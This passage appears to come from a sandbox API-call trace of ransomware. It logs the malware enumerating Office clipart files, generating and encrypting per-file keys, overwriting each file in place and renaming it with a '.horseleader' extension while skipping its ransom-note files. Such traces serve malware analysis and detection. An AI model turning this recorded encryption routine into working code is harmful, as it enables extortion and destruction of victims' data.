office\\clipart\\pub60cor\\bl00261_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00261_.wmf.horseleader")) returned 1 [0253.482] GetProcessHeap () returned 0x780000 [0253.482] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.482] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63b9b100, ftCreationTime.dwHighDateTime=0x1bd4b2c, ftLastAccessTime.dwLowDateTime=0x5f7031f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x63b9b100, ftLastWriteTime.dwHighDateTime=0x1bd4b2c, nFileSizeHigh=0x0, nFileSizeLow=0x9fc, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00262_.WMF", cAlternateFileName="")) returned 1 [0253.482] lstrcmpiW (lpString1="BL00262_.WMF", lpString2="Windows") returned -1 [0253.482] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 67 [0253.482] StrStrIW (lpFirst="BL00262_.WMF", lpSrch=".horseleader") returned 0x0 [0253.482] lstrcmpW (lpString1="BL00262_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.482] lstrcmpW (lpString1="BL00262_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.482] lstrlenW (lpString=".testttjffg") returned 11 [0253.482] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.482] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.482] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.482] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00262_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.484] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 67 [0253.484] StrStrW (lpFirst="BL00262_.WMF", lpSrch=".txt") returned 0x0 [0253.484] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2556) returned 1 [0253.484] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x9fc, lpOverlapped=0x0) returned 1 [0253.485] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff604, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.486] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x9fc, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x9fc, lpOverlapped=0x0) returned 1 [0253.486] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.486] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.486] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.486] CloseHandle (hObject=0x158) returned 1 [0253.486] GetProcessHeap () returned 0x780000 [0253.486] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.486] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF.horseleader") returned 79 [0253.486] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00262_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00262_.wmf.horseleader")) returned 1 [0253.487] GetProcessHeap () returned 0x780000 [0253.487] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.487] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcaca6c00, ftCreationTime.dwHighDateTime=0x1bd4b12, ftLastAccessTime.dwLowDateTime=0x519ef6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xcaca6c00, ftLastWriteTime.dwHighDateTime=0x1bd4b12, nFileSizeHigh=0x0, nFileSizeLow=0x1678, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00265_.WMF", cAlternateFileName="")) returned 1 [0253.488] lstrcmpiW (lpString1="BL00265_.WMF", lpString2="Windows") returned -1 [0253.488] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 67 [0253.488] StrStrIW (lpFirst="BL00265_.WMF", lpSrch=".horseleader") returned 0x0 [0253.488] lstrcmpW (lpString1="BL00265_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.488] lstrcmpW (lpString1="BL00265_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.488] lstrlenW (lpString=".testttjffg") returned 11 [0253.488] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.488] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.488] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.488] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00265_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.488] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 67 [0253.489] StrStrW (lpFirst="BL00265_.WMF", lpSrch=".txt") returned 0x0 [0253.489] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=5752) returned 1 [0253.489] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1678, lpOverlapped=0x0) returned 1 [0253.491] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe988, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.491] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1678, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1678, lpOverlapped=0x0) returned 1 [0253.492] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.492] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.492] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.492] CloseHandle (hObject=0x158) returned 1 [0253.492] GetProcessHeap () returned 0x780000 [0253.492] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.492] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF.horseleader") returned 79 [0253.492] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00265_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00265_.wmf.horseleader")) returned 1 [0253.493] GetProcessHeap () returned 0x780000 [0253.494] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.499] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2253700, ftCreationTime.dwHighDateTime=0x1bd4b1a, ftLastAccessTime.dwLowDateTime=0x5f7031f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf2253700, ftLastWriteTime.dwHighDateTime=0x1bd4b1a, nFileSizeHigh=0x0, nFileSizeLow=0xa54, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00267_.WMF", cAlternateFileName="")) returned 1 [0253.499] lstrcmpiW (lpString1="BL00267_.WMF", lpString2="Windows") returned -1 [0253.499] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 67 [0253.499] StrStrIW (lpFirst="BL00267_.WMF", lpSrch=".horseleader") returned 0x0 [0253.499] lstrcmpW (lpString1="BL00267_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.499] lstrcmpW (lpString1="BL00267_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.499] lstrlenW (lpString=".testttjffg") returned 11 [0253.500] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.500] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.500] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.500] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00267_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.501] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 67 [0253.501] StrStrW (lpFirst="BL00267_.WMF", lpSrch=".txt") returned 0x0 [0253.501] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2644) returned 1 [0253.501] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xa54, lpOverlapped=0x0) returned 1 [0253.502] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff5ac, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.503] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xa54, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xa54, lpOverlapped=0x0) returned 1 [0253.503] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.503] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.503] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.503] CloseHandle (hObject=0x158) returned 1 [0253.503] GetProcessHeap () returned 0x780000 [0253.503] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.503] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF.horseleader") returned 79 [0253.504] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00267_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00267_.wmf.horseleader")) returned 1 [0253.505] GetProcessHeap () returned 0x780000 [0253.505] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.505] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbde25400, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x519ef6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbde25400, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x1498, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00269_.WMF", cAlternateFileName="")) returned 1 [0253.505] lstrcmpiW (lpString1="BL00269_.WMF", lpString2="Windows") returned -1 [0253.505] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 67 [0253.505] StrStrIW (lpFirst="BL00269_.WMF", lpSrch=".horseleader") returned 0x0 [0253.505] lstrcmpW (lpString1="BL00269_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.505] lstrcmpW (lpString1="BL00269_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.505] lstrlenW (lpString=".testttjffg") returned 11 [0253.506] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.506] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.506] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.506] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00269_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.507] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 67 [0253.507] StrStrW (lpFirst="BL00269_.WMF", lpSrch=".txt") returned 0x0 [0253.507] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=5272) returned 1 [0253.507] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1498, lpOverlapped=0x0) returned 1 [0253.509] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffeb68, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.509] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1498, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1498, lpOverlapped=0x0) returned 1 [0253.509] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.509] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.509] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.510] CloseHandle (hObject=0x158) returned 1 [0253.510] GetProcessHeap () returned 0x780000 [0253.510] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.510] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF.horseleader") returned 79 [0253.510] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00269_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00269_.wmf.horseleader")) returned 1 [0253.512] GetProcessHeap () returned 0x780000 [0253.512] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.512] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d095f00, ftCreationTime.dwHighDateTime=0x1bd4b18, ftLastAccessTime.dwLowDateTime=0x519ef6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4d095f00, ftLastWriteTime.dwHighDateTime=0x1bd4b18, nFileSizeHigh=0x0, nFileSizeLow=0xbc8, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00270_.WMF", cAlternateFileName="")) returned 1 [0253.512] lstrcmpiW (lpString1="BL00270_.WMF", lpString2="Windows") returned -1 [0253.512] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 67 [0253.512] StrStrIW (lpFirst="BL00270_.WMF", lpSrch=".horseleader") returned 0x0 [0253.512] lstrcmpW (lpString1="BL00270_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.512] lstrcmpW (lpString1="BL00270_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.512] lstrlenW (lpString=".testttjffg") returned 11 [0253.512] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.512] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.512] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.512] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00270_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.513] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 67 [0253.513] StrStrW (lpFirst="BL00270_.WMF", lpSrch=".txt") returned 0x0 [0253.513] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3016) returned 1 [0253.513] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xbc8, lpOverlapped=0x0) returned 1 [0253.515] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff438, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.515] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xbc8, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xbc8, lpOverlapped=0x0) returned 1 [0253.515] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.516] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.516] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.516] CloseHandle (hObject=0x158) returned 1 [0253.516] GetProcessHeap () returned 0x780000 [0253.516] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.516] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF.horseleader") returned 79 [0253.516] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00270_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00270_.wmf.horseleader")) returned 1 [0253.517] GetProcessHeap () returned 0x780000 [0253.517] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.517] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd2a9800, ftCreationTime.dwHighDateTime=0x1bd4b17, ftLastAccessTime.dwLowDateTime=0x519ef6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfd2a9800, ftLastWriteTime.dwHighDateTime=0x1bd4b17, nFileSizeHigh=0x0, nFileSizeLow=0xec4, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00273_.WMF", cAlternateFileName="")) returned 1 [0253.517] lstrcmpiW (lpString1="BL00273_.WMF", lpString2="Windows") returned -1 [0253.517] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 67 [0253.517] StrStrIW (lpFirst="BL00273_.WMF", lpSrch=".horseleader") returned 0x0 [0253.517] lstrcmpW (lpString1="BL00273_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.517] lstrcmpW (lpString1="BL00273_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.517] lstrlenW (lpString=".testttjffg") returned 11 [0253.517] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.517] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.517] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.517] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00273_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.518] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 67 [0253.518] StrStrW (lpFirst="BL00273_.WMF", lpSrch=".txt") returned 0x0 [0253.518] GetFileSizeEx (in: hFile=0x158, 